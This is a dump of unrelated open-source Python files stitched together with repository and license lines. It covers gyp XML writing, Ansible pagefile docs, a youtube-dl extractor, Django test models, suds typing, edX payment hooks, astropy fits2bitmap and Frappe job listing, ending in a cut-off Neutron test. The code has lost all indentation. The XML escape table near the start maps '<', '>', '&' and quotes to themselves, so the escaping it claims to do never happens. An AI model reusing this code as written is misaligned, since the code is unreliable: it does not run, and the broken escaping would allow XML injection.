# Optionally in second position is a dictionary of the attributes.
rest = specification[1:]
if rest and isinstance(rest[0], dict):
for at, val in sorted(rest[0].iteritems()):
xml_parts.append(' %s="%s"' % (at, _XmlEscape(val, attr=True)))
rest = rest[1:]
if rest:
xml_parts.append('>')
all_strings = reduce(lambda x, y: x and isinstance(y, str), rest, True)
multi_line = not all_strings
if multi_line and new_line:
xml_parts.append(new_line)
for child_spec in rest:
# If it's a string, append a text node.
# Otherwise recurse over that child definition
if isinstance(child_spec, str):
xml_parts.append(_XmlEscape(child_spec))
else:
_ConstructContentList(xml_parts, child_spec, pretty, level + 1)
if multi_line and indentation:
xml_parts.append(indentation)
xml_parts.append('</%s>%s' % (name, new_line))
else:
xml_parts.append('/>%s' % new_line)
def WriteXmlIfChanged(content, path, encoding='utf-8', pretty=False,
win32=False):
""" Writes the XML content to disk, touching the file only if it has changed.
Args:
content: The structured content to be written.
path: Location of the file.
encoding: The encoding to report on the first line of the XML file.
pretty: True if we want pretty printing with indents and new lines.
"""
xml_string = XmlToString(content, encoding, pretty)
if win32 and os.linesep != '\r\n':
xml_string = xml_string.replace('\n', '\r\n')
# Get the old content
try:
f = open(path, 'r')
existing = f.read()
f.close()
except:
existing = None
# It has changed, write it
if existing != xml_string:
f = open(path, 'w')
f.write(xml_string)
f.close()
_xml_escape_map = {
'"': '"',
"'": ''',
'<': '<',
'>': '>',
'&': '&',
'\n': '
',
'\r': '
',
}
_xml_escape_re = re.compile(
"(%s)" % "|".join(map(re.escape, _xml_escape_map.keys())))
def _XmlEscape(value, attr=False):
""" Escape a string for inclusion in XML."""
def replace(match):
m = match.string[match.start() : match.end()]
# don't replace single quotes in attrs
if attr and m == "'":
return m
return _xml_escape_map[m]
return _xml_escape_re.sub(replace, value)
|
mit
|
qrkourier/ansible
|
lib/ansible/modules/windows/win_pagefile.py
|
42
|
3966
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright 2017, Liran Nisanov <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# this is a windows documentation stub. actual code lives in the .ps1
# file of the same name
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = r'''
---
module: win_pagefile
version_added: "2.4"
short_description: Query or change pagefile configuration
description:
- Query current pagefile configuration.
- Enable/Disable AutomaticManagedPagefile.
- Create new or override pagefile configuration.
options:
drive:
description:
- The drive of the pagefile.
initial_size:
description:
- The initial size of the pagefile in megabytes.
maximum_size:
description:
- The maximum size of the pagefile in megabytes.
override:
description:
- Override the current pagefile on the drive.
type: bool
default: 'yes'
system_managed:
description:
- Configures current pagefile to be managed by the system.
type: bool
default: 'no'
automatic:
description:
- Configures AutomaticManagedPagefile for the entire system.
type: bool
remove_all:
description:
- Remove all pagefiles in the system, not including automatic managed.
type: bool
default: 'no'
test_path:
description:
- Use Test-Path on the drive to make sure the drive is accessible before creating the pagefile.
type: bool
default: 'yes'
state:
description:
- State of the pagefile.
choices:
- present
- absent
- query
default: query
notes:
- There is difference between automatic managed pagefiles that configured once for the entire system and system managed pagefile that configured per pagefile.
- InitialSize 0 and MaximumSize 0 means the pagefile is managed by the system.
- Value out of range exception may be caused by several different issues, two common problems - No such drive, Pagefile size is too small.
- Setting a pagefile when AutomaticManagedPagefile is on will disable the AutomaticManagedPagefile.
author:
- Liran Nisanov (@LiranNis)
'''
EXAMPLES = r'''
- name: Query pagefiles configuration
win_pagefile:
- name: Query C pagefile
win_pagefile:
drive: C
- name: Set C pagefile, don't override if exists
win_pagefile:
drive: C
initial_size: 1024
maximum_size: 1024
override: no
state: present
- name: Set C pagefile, override if exists
win_pagefile:
drive: C
initial_size: 1024
maximum_size: 1024
state: present
- name: Remove C pagefile
win_pagefile:
drive: C
state: absent
- name: Remove all current pagefiles, enable AutomaticManagedPagefile and query at the end
win_pagefile:
remove_all: yes
automatic: yes
- name: Remove all pagefiles disable AutomaticManagedPagefile and set C pagefile
win_pagefile:
drive: C
initial_size: 2048
maximum_size: 2048
remove_all: yes
automatic: no
state: present
- name: Set D pagefile, override if exists
win_pagefile:
drive: d
initial_size: 1024
maximum_size: 1024
state: present
'''
RETURN = r'''
automatic_managed_pagefiles:
description: Whether the pagefiles is automatically managed.
returned: When state is query.
type: boolean
sample: true
pagefiles:
description: Contains caption, description, initial_size, maximum_size and name for each pagefile in the system.
returned: When state is query.
type: list
sample:
[{"caption": "c:\\ 'pagefile.sys'", "description": "'pagefile.sys' @ c:\\", "initial_size": 2048, "maximum_size": 2048, "name": "c:\\pagefile.sys"},
{"caption": "d:\\ 'pagefile.sys'", "description": "'pagefile.sys' @ d:\\", "initial_size": 1024, "maximum_size": 1024, "name": "d:\\pagefile.sys"}]
'''
|
gpl-3.0
|
kidburglar/youtube-dl
|
youtube_dl/extractor/crooksandliars.py
|
64
|
2061
|
from __future__ import unicode_literals
from .common import InfoExtractor
from ..utils import (
int_or_none,
qualities,
)
class CrooksAndLiarsIE(InfoExtractor):
_VALID_URL = r'https?://embed\.crooksandliars\.com/(?:embed|v)/(?P<id>[A-Za-z0-9]+)'
_TESTS = [{
'url': 'https://embed.crooksandliars.com/embed/8RUoRhRi',
'info_dict': {
'id': '8RUoRhRi',
'ext': 'mp4',
'title': 'Fox & Friends Says Protecting Atheists From Discrimination Is Anti-Christian!',
'description': 'md5:e1a46ad1650e3a5ec7196d432799127f',
'thumbnail': r're:^https?://.*\.jpg',
'timestamp': 1428207000,
'upload_date': '20150405',
'uploader': 'Heather',
'duration': 236,
}
}, {
'url': 'http://embed.crooksandliars.com/v/MTE3MjUtMzQ2MzA',
'only_matching': True,
}]
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage(
'http://embed.crooksandliars.com/embed/%s' % video_id, video_id)
manifest = self._parse_json(
self._search_regex(
r'var\s+manifest\s*=\s*({.+?})\n', webpage, 'manifest JSON'),
video_id)
quality = qualities(('webm_low', 'mp4_low', 'webm_high', 'mp4_high'))
formats = [{
'url': item['url'],
'format_id': item['type'],
'quality': quality(item['type']),
} for item in manifest['flavors'] if item['mime'].startswith('video/')]
self._sort_formats(formats)
return {
'url': url,
'id': video_id,
'title': manifest['title'],
'description': manifest.get('description'),
'thumbnail': self._proto_relative_url(manifest.get('poster')),
'timestamp': int_or_none(manifest.get('created')),
'uploader': manifest.get('author'),
'duration': int_or_none(manifest.get('duration')),
'formats': formats,
}
|
unlicense
|
auready/django
|
tests/db_functions/models.py
|
11
|
1699
|
"""
Tests for built in Function expressions.
"""
from django.db import models
class Author(models.Model):
name = models.CharField(max_length=50)
alias = models.CharField(max_length=50, null=True, blank=True)
goes_by = models.CharField(max_length=50, null=True, blank=True)
age = models.PositiveSmallIntegerField(default=30)
def __str__(self):
return self.name
class Article(models.Model):
authors = models.ManyToManyField(Author, related_name='articles')
title = models.CharField(max_length=50)
summary = models.CharField(max_length=200, null=True, blank=True)
text = models.TextField()
written = models.DateTimeField()
published = models.DateTimeField(null=True, blank=True)
updated = models.DateTimeField(null=True, blank=True)
views = models.PositiveIntegerField(default=0)
def __str__(self):
return self.title
class Fan(models.Model):
name = models.CharField(max_length=50)
age = models.PositiveSmallIntegerField(default=30)
author = models.ForeignKey(Author, models.CASCADE, related_name='fans')
def __str__(self):
return self.name
class DTModel(models.Model):
name = models.CharField(max_length=32)
start_datetime = models.DateTimeField(null=True, blank=True)
end_datetime = models.DateTimeField(null=True, blank=True)
start_date = models.DateField(null=True, blank=True)
end_date = models.DateField(null=True, blank=True)
start_time = models.TimeField(null=True, blank=True)
end_time = models.TimeField(null=True, blank=True)
duration = models.DurationField(null=True, blank=True)
def __str__(self):
return 'DTModel({0})'.format(self.name)
|
bsd-3-clause
|
sonuyos/couchpotato
|
libs/suds/mx/typer.py
|
203
|
4116
|
# This program is free software; you can redistribute it and/or modify
# it under the terms of the (LGPL) GNU Lesser General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Library Lesser General Public License for more details at
# ( http://www.gnu.org/licenses/lgpl.html ).
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
# written by: Jeff Ortel ( [email protected] )
"""
Provides sx typing classes.
"""
from logging import getLogger
from suds import *
from suds.mx import *
from suds.sax import Namespace as NS
from suds.sax.text import Text
log = getLogger(__name__)
class Typer:
"""
Provides XML node typing as either automatic or manual.
@cvar types: A dict of class to xs type mapping.
@type types: dict
"""
types = {
int : ('int', NS.xsdns),
long : ('long', NS.xsdns),
float : ('float', NS.xsdns),
str : ('string', NS.xsdns),
unicode : ('string', NS.xsdns),
Text : ('string', NS.xsdns),
bool : ('boolean', NS.xsdns),
}
@classmethod
def auto(cls, node, value=None):
"""
Automatically set the node's xsi:type attribute based on either I{value}'s
class or the class of the node's text. When I{value} is an unmapped class,
the default type (xs:any) is set.
@param node: An XML node
@type node: L{sax.element.Element}
@param value: An object that is or would be the node's text.
@type value: I{any}
@return: The specified node.
@rtype: L{sax.element.Element}
"""
if value is None:
value = node.getText()
if isinstance(value, Object):
known = cls.known(value)
if known.name is None:
return node
tm = (known.name, known.namespace())
else:
tm = cls.types.get(value.__class__, cls.types.get(str))
cls.manual(node, *tm)
return node
@classmethod
def manual(cls, node, tval, ns=None):
"""
Set the node's xsi:type attribute based on either I{value}'s
class or the class of the node's text. Then adds the referenced
prefix(s) to the node's prefix mapping.
@param node: An XML node
@type node: L{sax.element.Element}
@param tval: The name of the schema type.
@type tval: str
@param ns: The XML namespace of I{tval}.
@type ns: (prefix, uri)
@return: The specified node.
@rtype: L{sax.element.Element}
"""
xta = ':'.join((NS.xsins[0], 'type'))
node.addPrefix(NS.xsins[0], NS.xsins[1])
if ns is None:
node.set(xta, tval)
else:
ns = cls.genprefix(node, ns)
qname = ':'.join((ns[0], tval))
node.set(xta, qname)
node.addPrefix(ns[0], ns[1])
return node
@classmethod
def genprefix(cls, node, ns):
"""
Generate a prefix.
@param node: An XML node on which the prefix will be used.
@type node: L{sax.element.Element}
@param ns: A namespace needing an unique prefix.
@type ns: (prefix, uri)
@return: The I{ns} with a new prefix.
"""
for n in range(1, 1024):
p = 'ns%d' % n
u = node.resolvePrefix(p, default=None)
if u is None or u == ns[1]:
return (p, ns[1])
raise Exception('auto prefix, exhausted')
@classmethod
def known(cls, object):
try:
md = object.__metadata__
known = md.sxtype
return known
except:
pass
|
gpl-3.0
|
ubc/edx-platform
|
lms/djangoapps/shoppingcart/processors/__init__.py
|
215
|
2574
|
"""
Public API for payment processor implementations.
The specific implementation is determined at runtime using Django settings:
CC_PROCESSOR_NAME: The name of the Python module (in `shoppingcart.processors`) to use.
CC_PROCESSOR: Dictionary of configuration options for specific processor implementations,
keyed to processor names.
"""
from django.conf import settings
# Import the processor implementation, using `CC_PROCESSOR_NAME`
# as the name of the Python module in `shoppingcart.processors`
PROCESSOR_MODULE = __import__(
'shoppingcart.processors.' + settings.CC_PROCESSOR_NAME,
fromlist=[
'render_purchase_form_html',
'process_postpay_callback',
'get_purchase_endpoint',
'get_signed_purchase_params',
]
)
def render_purchase_form_html(cart, **kwargs):
"""
Render an HTML form with POSTs to the hosted payment processor.
Args:
cart (Order): The order model representing items in the user's cart.
Returns:
unicode: the rendered HTML form
"""
return PROCESSOR_MODULE.render_purchase_form_html(cart, **kwargs)
def process_postpay_callback(params, **kwargs):
"""
Handle a response from the payment processor.
Concrete implementations should:
1) Verify the parameters and determine if the payment was successful.
2) If successful, mark the order as purchased and call `purchased_callbacks` of the cart items.
3) If unsuccessful, try to figure out why and generate a helpful error message.
4) Return a dictionary of the form:
{'success': bool, 'order': Order, 'error_html': str}
Args:
params (dict): Dictionary of parameters received from the payment processor.
Keyword Args:
Can be used to provide additional information to concrete implementations.
Returns:
dict
"""
return PROCESSOR_MODULE.process_postpay_callback(params, **kwargs)
def get_purchase_endpoint():
"""
Return the URL of the current payment processor's endpoint.
Returns:
unicode
"""
return PROCESSOR_MODULE.get_purchase_endpoint()
def get_signed_purchase_params(cart, **kwargs):
"""
Return the parameters to send to the current payment processor.
Args:
cart (Order): The order model representing items in the user's cart.
Keyword Args:
Can be used to provide additional information to concrete implementations.
Returns:
dict
"""
return PROCESSOR_MODULE.get_signed_purchase_params(cart, **kwargs)
|
agpl-3.0
|
Zhongqilong/mykbengineer
|
kbe/res/scripts/common/Lib/site-packages/pip/_vendor/requests/packages/chardet/big5prober.py
|
2931
|
1684
|
######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Communicator client code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from .mbcharsetprober import MultiByteCharSetProber
from .codingstatemachine import CodingStateMachine
from .chardistribution import Big5DistributionAnalysis
from .mbcssm import Big5SMModel
class Big5Prober(MultiByteCharSetProber):
def __init__(self):
MultiByteCharSetProber.__init__(self)
self._mCodingSM = CodingStateMachine(Big5SMModel)
self._mDistributionAnalyzer = Big5DistributionAnalysis()
self.reset()
def get_charset_name(self):
return "Big5"
|
lgpl-3.0
|
whitepyro/debian_server_setup
|
lib/MultipartPostHandler.py
|
62
|
3557
|
#!/usr/bin/python
####
# 06/2010 Nic Wolfe <[email protected]>
# 02/2006 Will Holcomb <[email protected]>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
import urllib
import urllib2
import mimetools, mimetypes
import os, sys
# Controls how sequences are uncoded. If true, elements may be given multiple values by
# assigning a sequence.
doseq = 1
class MultipartPostHandler(urllib2.BaseHandler):
handler_order = urllib2.HTTPHandler.handler_order - 10 # needs to run first
def http_request(self, request):
data = request.get_data()
if data is not None and type(data) != str:
v_files = []
v_vars = []
try:
for(key, value) in data.items():
if type(value) in (file, list, tuple):
v_files.append((key, value))
else:
v_vars.append((key, value))
except TypeError:
systype, value, traceback = sys.exc_info()
raise TypeError, "not a valid non-string sequence or mapping object", traceback
if len(v_files) == 0:
data = urllib.urlencode(v_vars, doseq)
else:
boundary, data = MultipartPostHandler.multipart_encode(v_vars, v_files)
contenttype = 'multipart/form-data; boundary=%s' % boundary
if(request.has_header('Content-Type')
and request.get_header('Content-Type').find('multipart/form-data') != 0):
print "Replacing %s with %s" % (request.get_header('content-type'), 'multipart/form-data')
request.add_unredirected_header('Content-Type', contenttype)
request.add_data(data)
return request
@staticmethod
def multipart_encode(vars, files, boundary = None, buffer = None):
if boundary is None:
boundary = mimetools.choose_boundary()
if buffer is None:
buffer = ''
for(key, value) in vars:
buffer += '--%s\r\n' % boundary
buffer += 'Content-Disposition: form-data; name="%s"' % key
buffer += '\r\n\r\n' + value + '\r\n'
for(key, fd) in files:
# allow them to pass in a file or a tuple with name & data
if type(fd) == file:
name_in = fd.name
fd.seek(0)
data_in = fd.read()
elif type(fd) in (tuple, list):
name_in, data_in = fd
filename = os.path.basename(name_in)
contenttype = mimetypes.guess_type(filename)[0] or 'application/octet-stream'
buffer += '--%s\r\n' % boundary
buffer += 'Content-Disposition: form-data; name="%s"; filename="%s"\r\n' % (key, filename)
buffer += 'Content-Type: %s\r\n' % contenttype
# buffer += 'Content-Length: %s\r\n' % file_size
buffer += '\r\n' + data_in + '\r\n'
buffer += '--%s--\r\n\r\n' % boundary
return boundary, buffer
https_request = http_request
|
gpl-3.0
|
MSeifert04/astropy
|
astropy/visualization/scripts/fits2bitmap.py
|
2
|
7795
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
import os
from distutils.version import LooseVersion
from astropy.visualization.mpl_normalize import simple_norm
from astropy import log
from astropy.io.fits import getdata
def fits2bitmap(filename, ext=0, out_fn=None, stretch='linear',
power=1.0, asinh_a=0.1, min_cut=None, max_cut=None,
min_percent=None, max_percent=None, percent=None,
cmap='Greys_r'):
"""
Create a bitmap file from a FITS image, applying a stretching
transform between minimum and maximum cut levels and a matplotlib
colormap.
Parameters
----------
filename : str
The filename of the FITS file.
ext : int
FITS extension name or number of the image to convert. The
default is 0.
out_fn : str
The filename of the output bitmap image. The type of bitmap
is determined by the filename extension (e.g. '.jpg', '.png').
The default is a PNG file with the same name as the FITS file.
stretch : {{'linear', 'sqrt', 'power', log', 'asinh'}}
The stretching function to apply to the image. The default is
'linear'.
power : float, optional
The power index for ``stretch='power'``. The default is 1.0.
asinh_a : float, optional
For ``stretch='asinh'``, the value where the asinh curve
transitions from linear to logarithmic behavior, expressed as a
fraction of the normalized image. Must be in the range between
0 and 1. The default is 0.1.
min_cut : float, optional
The pixel value of the minimum cut level. Data values less than
``min_cut`` will set to ``min_cut`` before stretching the image.
The default is the image minimum. ``min_cut`` overrides
``min_percent``.
max_cut : float, optional
The pixel value of the maximum cut level. Data values greater
than ``min_cut`` will set to ``min_cut`` before stretching the
image. The default is the image maximum. ``max_cut`` overrides
``max_percent``.
min_percent : float, optional
The percentile value used to determine the pixel value of
minimum cut level. The default is 0.0. ``min_percent``
overrides ``percent``.
max_percent : float, optional
The percentile value used to determine the pixel value of
maximum cut level. The default is 100.0. ``max_percent``
overrides ``percent``.
percent : float, optional
The percentage of the image values used to determine the pixel
values of the minimum and maximum cut levels. The lower cut
level will set at the ``(100 - percent) / 2`` percentile, while
the upper cut level will be set at the ``(100 + percent) / 2``
percentile. The default is 100.0. ``percent`` is ignored if
either ``min_percent`` or ``max_percent`` is input.
cmap : str
The matplotlib color map name. The default is 'Greys_r'.
"""
import matplotlib
import matplotlib.cm as cm
import matplotlib.image as mimg
# __main__ gives ext as a string
try:
ext = int(ext)
except ValueError:
pass
try:
image = getdata(filename, ext)
except Exception as e:
log.critical(e)
return 1
if image.ndim != 2:
log.critical('data in FITS extension {} is not a 2D array'
.format(ext))
if out_fn is None:
out_fn = os.path.splitext(filename)[0]
if out_fn.endswith('.fits'):
out_fn = os.path.splitext(out_fn)[0]
out_fn += '.png'
# need to explicitly define the output format due to a bug in
# matplotlib (<= 2.1), otherwise the format will always be PNG
out_format = os.path.splitext(out_fn)[1][1:]
# workaround for matplotlib 2.0.0 bug where png images are inverted
# (mpl-#7656)
if (out_format.lower() == 'png' and
LooseVersion(matplotlib.__version__) == LooseVersion('2.0.0')):
image = image[::-1]
try:
cm.get_cmap(cmap)
except ValueError:
log.critical('{} is not a valid matplotlib colormap name.'
.format(cmap))
return 1
norm = simple_norm(image, stretch=stretch, power=power, asinh_a=asinh_a,
min_cut=min_cut, max_cut=max_cut,
min_percent=min_percent, max_percent=max_percent,
percent=percent)
mimg.imsave(out_fn, norm(image), cmap=cmap, origin='lower',
format=out_format)
log.info(f'Saved file to {out_fn}.')
def main(args=None):
import argparse
parser = argparse.ArgumentParser(
description='Create a bitmap file from a FITS image.')
parser.add_argument('-e', '--ext', metavar='hdu', default=0,
help='Specify the HDU extension number or name '
'(Default is 0).')
parser.add_argument('-o', metavar='filename', type=str, default=None,
help='Filename for the output image (Default is a '
'PNG file with the same name as the FITS file).')
parser.add_argument('--stretch', type=str, default='linear',
help='Type of image stretching ("linear", "sqrt", '
'"power", "log", or "asinh") (Default is "linear").')
parser.add_argument('--power', type=float, default=1.0,
help='Power index for "power" stretching (Default is '
'1.0).')
parser.add_argument('--asinh_a', type=float, default=0.1,
help='The value in normalized image where the asinh '
'curve transitions from linear to logarithmic '
'behavior (used only for "asinh" stretch) '
'(Default is 0.1).')
parser.add_argument('--min_cut', type=float, default=None,
help='The pixel value of the minimum cut level '
'(Default is the image minimum).')
parser.add_argument('--max_cut', type=float, default=None,
help='The pixel value of the maximum cut level '
'(Default is the image maximum).')
parser.add_argument('--min_percent', type=float, default=None,
help='The percentile value used to determine the '
'minimum cut level (Default is 0).')
parser.add_argument('--max_percent', type=float, default=None,
help='The percentile value used to determine the '
'maximum cut level (Default is 100).')
parser.add_argument('--percent', type=float, default=None,
help='The percentage of the image values used to '
'determine the pixel values of the minimum and '
'maximum cut levels (Default is 100).')
parser.add_argument('--cmap', metavar='colormap_name', type=str,
default='Greys_r', help='matplotlib color map name '
'(Default is "Greys_r").')
parser.add_argument('filename', nargs='+',
help='Path to one or more FITS files to convert')
args = parser.parse_args(args)
for filename in args.filename:
fits2bitmap(filename, ext=args.ext, out_fn=args.o,
stretch=args.stretch, min_cut=args.min_cut,
max_cut=args.max_cut, min_percent=args.min_percent,
max_percent=args.max_percent, percent=args.percent,
power=args.power, asinh_a=args.asinh_a, cmap=args.cmap)
|
bsd-3-clause
|
neilLasrado/frappe
|
frappe/core/page/background_jobs/background_jobs.py
|
17
|
1197
|
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import frappe
from rq import Queue, Worker
from frappe.utils.background_jobs import get_redis_conn
from frappe.utils import format_datetime, cint
colors = {
'queued': 'orange',
'failed': 'red',
'started': 'blue',
'finished': 'green'
}
@frappe.whitelist()
def get_info(show_failed=False):
conn = get_redis_conn()
queues = Queue.all(conn)
workers = Worker.all(conn)
jobs = []
def add_job(j, name):
if j.kwargs.get('site')==frappe.local.site:
jobs.append({
'job_name': j.kwargs.get('kwargs', {}).get('playbook_method') \
or str(j.kwargs.get('job_name')),
'status': j.status, 'queue': name,
'creation': format_datetime(j.created_at),
'color': colors[j.status]
})
if j.exc_info:
jobs[-1]['exc_info'] = j.exc_info
for w in workers:
j = w.get_current_job()
if j:
add_job(j, w.name)
for q in queues:
if q.name != 'failed':
for j in q.get_jobs(): add_job(j, q.name)
if cint(show_failed):
for q in queues:
if q.name == 'failed':
for j in q.get_jobs()[:10]: add_job(j, q.name)
return jobs
|
mit
|
aricchen/openHR
|
openerp/addons/base_gengo/__init__.py
|
57
|
1104
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Openerp sa (<http://openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import res_company
import ir_translation
import wizard
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
|
Jet-Streaming/gyp
|
build/lib/gyp/MSVSUserFile.py
|
8
|
5241
|
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Visual Studio user preferences file writer."""
import os
import re
import socket # for gethostname
import gyp.common
import gyp.easy_xml as easy_xml
#------------------------------------------------------------------------------
def _FindCommandInPath(command):
"""If there are no slashes in the command given, this function
searches the PATH env to find the given command, and converts it
to an absolute path. We have to do this because MSVS is looking
for an actual file to launch a debugger on, not just a command
line. Note that this happens at GYP time, so anything needing to
be built needs to have a full path."""
if '/' in command or '\\' in command:
# If the command already has path elements (either relative or
# absolute), then assume it is constructed properly.
return command
else:
# Search through the path list and find an existing file that
# we can access.
paths = os.environ.get('PATH','').split(os.pathsep)
for path in paths:
item = os.path.join(path, command)
if os.path.isfile(item) and os.access(item, os.X_OK):
return item
return command
def _QuoteWin32CommandLineArgs(args):
new_args = []
for arg in args:
# Replace all double-quotes with double-double-quotes to escape
# them for cmd shell, and then quote the whole thing if there
# are any.
if arg.find('"') != -1:
arg = '""'.join(arg.split('"'))
arg = '"%s"' % arg
# Otherwise, if there are any spaces, quote the whole arg.
elif re.search(r'[ \t\n]', arg):
arg = '"%s"' % arg
new_args.append(arg)
return new_args
class Writer(object):
"""Visual Studio XML user user file writer."""
def __init__(self, user_file_path, version, name):
"""Initializes the user file.
Args:
user_file_path: Path to the user file.
version: Version info.
name: Name of the user file.
"""
self.user_file_path = user_file_path
self.version = version
self.name = name
self.configurations = {}
def AddConfig(self, name):
"""Adds a configuration to the project.
Args:
name: Configuration name.
"""
self.configurations[name] = ['Configuration', {'Name': name}]
def AddDebugSettings(self, config_name, command, environment = {},
working_directory=""):
"""Adds a DebugSettings node to the user file for a particular config.
Args:
command: command line to run. First element in the list is the
executable. All elements of the command will be quoted if
necessary.
working_directory: other files which may trigger the rule. (optional)
"""
command = _QuoteWin32CommandLineArgs(command)
abs_command = _FindCommandInPath(command[0])
if environment and isinstance(environment, dict):
env_list = ['%s="%s"' % (key, val)
for (key,val) in environment.iteritems()]
environment = ' '.join(env_list)
else:
environment = ''
n_cmd = ['DebugSettings',
{'Command': abs_command,
'WorkingDirectory': working_directory,
'CommandArguments': " ".join(command[1:]),
'RemoteMachine': socket.gethostname(),
'Environment': environment,
'EnvironmentMerge': 'true',
# Currently these are all "dummy" values that we're just setting
# in the default manner that MSVS does it. We could use some of
# these to add additional capabilities, I suppose, but they might
# not have parity with other platforms then.
'Attach': 'false',
'DebuggerType': '3', # 'auto' debugger
'Remote': '1',
'RemoteCommand': '',
'HttpUrl': '',
'PDBPath': '',
'SQLDebugging': '',
'DebuggerFlavor': '0',
'MPIRunCommand': '',
'MPIRunArguments': '',
'MPIRunWorkingDirectory': '',
'ApplicationCommand': '',
'ApplicationArguments': '',
'ShimCommand': '',
'MPIAcceptMode': '',
'MPIAcceptFilter': ''
}]
# Find the config, and add it if it doesn't exist.
if config_name not in self.configurations:
self.AddConfig(config_name)
# Add the DebugSettings onto the appropriate config.
self.configurations[config_name].append(n_cmd)
def WriteIfChanged(self):
"""Writes the user file."""
configs = ['Configurations']
for config, spec in sorted(self.configurations.iteritems()):
configs.append(spec)
content = ['VisualStudioUserFile',
{'Version': self.version.ProjectVersion(),
'Name': self.name
},
configs]
easy_xml.WriteXmlIfChanged(content, self.user_file_path,
encoding="Windows-1252")
|
bsd-3-clause
|
jessrosenfield/pants
|
src/python/pants/backend/core/tasks/target_filter_task_mixin.py
|
7
|
1504
|
# coding=utf-8
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
from pants.backend.core.tasks.task import Task
from pants.base.exceptions import TaskError
class TargetFilterTaskMixin(Task):
"""A Task mixin that provides methods to help with filtering by target type."""
class InvalidTargetType(TaskError):
"""Indicates a target type name that is not registered or does not point to a `Target` type."""
def target_types_for_alias(self, alias):
"""Returns all the target types that might be produced by the given alias.
Normally there is 1 target type per alias, but macros can expand a single alias to several
target types.
:param string alias: The alias to look up associated target types for.
:returns: The set of target types that can be produced by the given alias.
:raises :class:`TargetFilterTaskMixin.InvalidTargetType`: when no target types correspond to
the given `alias`.
"""
registered_aliases = self.context.build_file_parser.registered_aliases()
target_types = registered_aliases.target_types_by_alias.get(alias, None)
if not target_types:
raise self.InvalidTargetType('Not a target type: {}'.format(alias))
return target_types
|
apache-2.0
|
bigswitch/neutron
|
neutron/tests/unit/callbacks/test_manager.py
|
5
|
8124
|
# Copyright 2015 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from neutron.callbacks import events
from neutron.callbacks import exceptions
from neutron.callbacks import manager
from neutron.callbacks import resources
from neutron.tests import base
def callback_1(*args, **kwargs):
callback_1.counter += 1
callback_id_1 = manager._get_id(callback_1)
def callback_2(*args, **kwargs):
callback_2.counter += 1
callback_id_2 = manager._get_id(callback_2)
def callback_raise(*args, **kwargs):
raise Exception()
class CallBacksManagerTestCase(base.BaseTestCase):
def setUp(self):
super(CallBacksManagerTestCase, self).setUp()
self.manager = manager.CallbacksManager()
callback_1.counter = 0
callback_2.counter = 0
def test_subscribe(self):
self.manager.subscribe(
callback_1, resources.PORT, events.BEFORE_CREATE)
self.assertIsNotNone(
self.manager._callbacks[resources.PORT][events.BEFORE_CREATE])
self.assertIn(callback_id_1, self.manager._index)
def test_subscribe_unknown(self):
self.manager.subscribe(
callback_1, 'my_resource', 'my-event')
self.assertIsNotNone(
self.manager._callbacks['my_resource']['my-event'])
self.assertIn(callback_id_1, self.manager._index)
def test_subscribe_is_idempotent(self):
self.manager.subscribe(
callback_1, resources.PORT, events.BEFORE_CREATE)
self.manager.subscribe(
